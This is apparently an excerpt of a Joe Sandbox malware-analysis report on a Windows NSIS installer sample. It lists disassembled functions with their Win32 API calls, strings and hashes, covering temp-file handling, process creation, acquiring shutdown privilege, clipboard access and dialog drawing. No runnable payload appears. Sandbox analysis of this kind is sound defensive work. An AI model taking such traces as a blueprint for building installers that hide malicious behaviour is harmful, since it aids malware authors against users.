GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
lstrcatW.KERNEL32(00441800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040384E
SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
SetEnvironmentVariableW.KERNEL32(TMP,00441800,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
DeleteFileW.KERNEL32(00441000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
lstrlenW.KERNEL32(00441800,0043F000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

wsprintfW.USER32 ref: 004039B1
GetFileAttributesW.KERNEL32(00437800,00441800), ref: 004039E4
DeleteFileW.KERNEL32(00437800), ref: 004039F0
SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 00403A1E

Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321

CopyFileW.KERNEL32(00442800,00437800,00000001,00441800,00000000), ref: 00403A34

Part of subcall function 00405B3A: CreateProcessW.KERNEL32(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70

Part of subcall function 004068B4: FindFirstFileW.KERNEL32(74DF3420,0042FAB8,0042F270,00405F77,0042F270,0042F270,00000000,0042F270,0042F270,74DF3420,?,00441800,00405C83,?,74DF3420,00441800), ref: 004068BF
Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB

OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
ExitProcess.KERNEL32 ref: 00403A9F
CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AA6
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
ExitProcess.KERNEL32 ref: 00403B49

Part of subcall function 00405B05: CreateDirectoryW.KERNEL32(?,00000000,00403525,00441800,00441800,00441800,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B

Strings

SeShutdownPrivilege, xrefs: 00403AD8
\Temp, xrefs: 0040382C
NSIS Error, xrefs: 00403695
Low, xrefs: 00403848
Error launching installer, xrefs: 004038FD
UXTHEME, xrefs: 00403620, 00403625, 0040362B
TEMP, xrefs: 0040385A
~nsu%X.tmp, xrefs: 004039A8
TMP, xrefs: 00403862

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
API String ID: 1813718867-2779336553
Opcode ID: 32ccfccbee9d2f95e380080254fd3e205a9f5d358a382af22345ff9c53e9cdef
Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
Opcode Fuzzy Hash: 32ccfccbee9d2f95e380080254fd3e205a9f5d358a382af22345ff9c53e9cdef
Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E

Function 00405C63 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,74DF3420,00441800,0043F000), ref: 00405C8C
lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,74DF3420,00441800,0043F000), ref: 00405CD4
lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,74DF3420,00441800,0043F000), ref: 00405CF7
lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,74DF3420,00441800,0043F000), ref: 00405CFD
FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,74DF3420,00441800,0043F000), ref: 00405D0D
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
FindClose.KERNEL32(00000000), ref: 00405DBC

Strings

pB, xrefs: 00405CBC
\*.*, xrefs: 00405CCE

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*$pB
API String ID: 2035342205-1006940126
Opcode ID: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
Opcode Fuzzy Hash: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE

Function 0040571B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405779
GetDlgItem.USER32(?,000003EE), ref: 00405788
GetClientRect.USER32(?,?), ref: 004057C5
GetSystemMetrics.USER32(00000002), ref: 004057CC
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
ShowWindow.USER32(?,00000008), ref: 00405868
GetDlgItem.USER32(?,000003EC), ref: 00405889
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
GetDlgItem.USER32(?,000003F8), ref: 00405797

Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

GetDlgItem.USER32(?,000003EC), ref: 004058DB
CreateThread.KERNEL32(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
CloseHandle.KERNEL32(00000000), ref: 004058F0
ShowWindow.USER32(00000000), ref: 00405914
ShowWindow.USER32(?,00000008), ref: 00405919
ShowWindow.USER32(00000008), ref: 00405963
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
CreatePopupMenu.USER32 ref: 004059A8
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
GetWindowRect.USER32(?,?), ref: 004059DC
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
OpenClipboard.USER32(00000000), ref: 00405A3D
EmptyClipboard.USER32 ref: 00405A43
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
GlobalLock.KERNEL32(00000000), ref: 00405A59
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
CloseClipboard.USER32 ref: 00405A9E

Strings

{, xrefs: 00405981

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
Opcode Fuzzy Hash: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58

Function 00404F43 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F5B
GetDlgItem.USER32(?,00000408), ref: 00404F66
GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
DeleteObject.GDI32(00000000), ref: 0040503D
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F

Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
GetWindowLongW.USER32(?,000000F0), ref: 00405181
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
ShowWindow.USER32(?,00000005), ref: 0040519F
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
ImageList_Destroy.COMCTL32(?), ref: 0040536D
GlobalFree.KERNEL32(?), ref: 0040537D
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
ShowWindow.USER32(?,00000000), ref: 00405527
GetDlgItem.USER32(?,000003FE), ref: 00405532
ShowWindow.USER32(00000000), ref: 00405539

Strings

N, xrefs: 004051D8
, xrefs: 00405511
M, xrefs: 004050F7

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58

Function 00403FD7 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
ShowWindow.USER32(?), ref: 00404033
GetWindowLongW.USER32(?,000000F0), ref: 00404045
ShowWindow.USER32(?,00000004), ref: 0040405E
DestroyWindow.USER32 ref: 00404072
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
GetDlgItem.USER32(?,?), ref: 004040AA
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
IsWindowEnabled.USER32(00000000), ref: 004040C5
GetDlgItem.USER32(?,00000001), ref: 00404170
GetDlgItem.USER32(?,00000002), ref: 0040417A
SetClassLongW.USER32(?,000000F2,?), ref: 00404194
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
GetDlgItem.USER32(?,00000003), ref: 0040428B
ShowWindow.USER32(00000000,?), ref: 004042AC
EnableWindow.USER32(?,?), ref: 004042BE
EnableWindow.USER32(?,?), ref: 004042D9
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
EnableMenuItem.USER32(00000000), ref: 004042F6
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
ShowWindow.USER32(?,0000000A), ref: 00404493

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 1860320154-0
Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D

Function 00403C29 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978

lstrcatW.KERNEL32(00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420,00441800,00000000,0043F000,00008001), ref: 00403CAA
lstrlenW.KERNEL32(004326A0,?,?,?,004326A0,00000000,0043F800,00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420), ref: 00403D2A
lstrcmpiW.KERNEL32(00432698,.exe,004326A0,?,?,?,004326A0,00000000,0043F800,00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
GetFileAttributesW.KERNEL32(004326A0), ref: 00403D48
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403D91

Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB

RegisterClassW.USER32(004336A0), ref: 00403DCE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
ShowWindow.USER32(00000005,00000000), ref: 00403E51
GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
RegisterClassW.USER32(004336A0), ref: 00403E93
DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2

Strings

RichEd32, xrefs: 00403E65
Control Panel\Desktop\ResourceLocale, xrefs: 00403C5D
RichEdit, xrefs: 00403E84
RichEdit20W, xrefs: 00403E75, 00403E7B
.exe, xrefs: 00403D37
_Nb, xrefs: 00403DAD, 00403E15
RichEd20, xrefs: 00403E57
.DEFAULT\Control Panel\International, xrefs: 00403C95

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1115850852
Opcode ID: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
Opcode Fuzzy Hash: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D

Function 00404695 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
GetDlgItem.USER32(?,000003E8), ref: 00404747
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
GetSysColor.USER32(?), ref: 00404775
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
lstrlenW.KERNEL32(?), ref: 00404796
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
GetDlgItem.USER32(?,0000040A), ref: 00404811
SendMessageW.USER32(00000000), ref: 00404818
GetDlgItem.USER32(?,000003E8), ref: 00404843
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
LoadCursorW.USER32(00000000,00007F02), ref: 00404894
SetCursor.USER32(00000000), ref: 00404897
LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
SetCursor.USER32(00000000), ref: 004048B3
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4

Strings

N, xrefs: 00404831

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N
API String ID: 3103080414-1130791706
Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4

Function 0040619D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1

Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE

GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
wsprintfA.USER32 ref: 0040621C
GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
GlobalFree.KERNEL32(00000000), ref: 00406305
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C

Part of subcall function 00406047: GetFileAttributesW.KERNEL32(00000003,004030C2,00442800,80000000,00000003), ref: 0040604B
Part of subcall function 00406047: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

Strings

%ls=%ls, xrefs: 00406212
[Rename], xrefs: 00406286, 00406298

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 67e7abcb15a3b792ff514517dbaa51231beb97817eaf9b334bdc8e12bec0558b
Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
Opcode Fuzzy Hash: 67e7abcb15a3b792ff514517dbaa51231beb97817eaf9b334bdc8e12bec0558b
Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD

Function 004049C7 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404A16
SetWindowTextW.USER32(00000000,?), ref: 00404A40
SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
CoTaskMemFree.OLE32(00000000), ref: 00404AFC
lstrcmpiW.KERNEL32(004326A0,0042CA68,00000000,?,?), ref: 00404B2E
lstrcatW.KERNEL32(?,004326A0), ref: 00404B3A
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C

Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE

Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
Part of subcall function 00406805: CharNextW.USER32(?,0043F000,74DF3420,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
Part of subcall function 00406805: CharPrevW.USER32(?,?,74DF3420,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F

GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
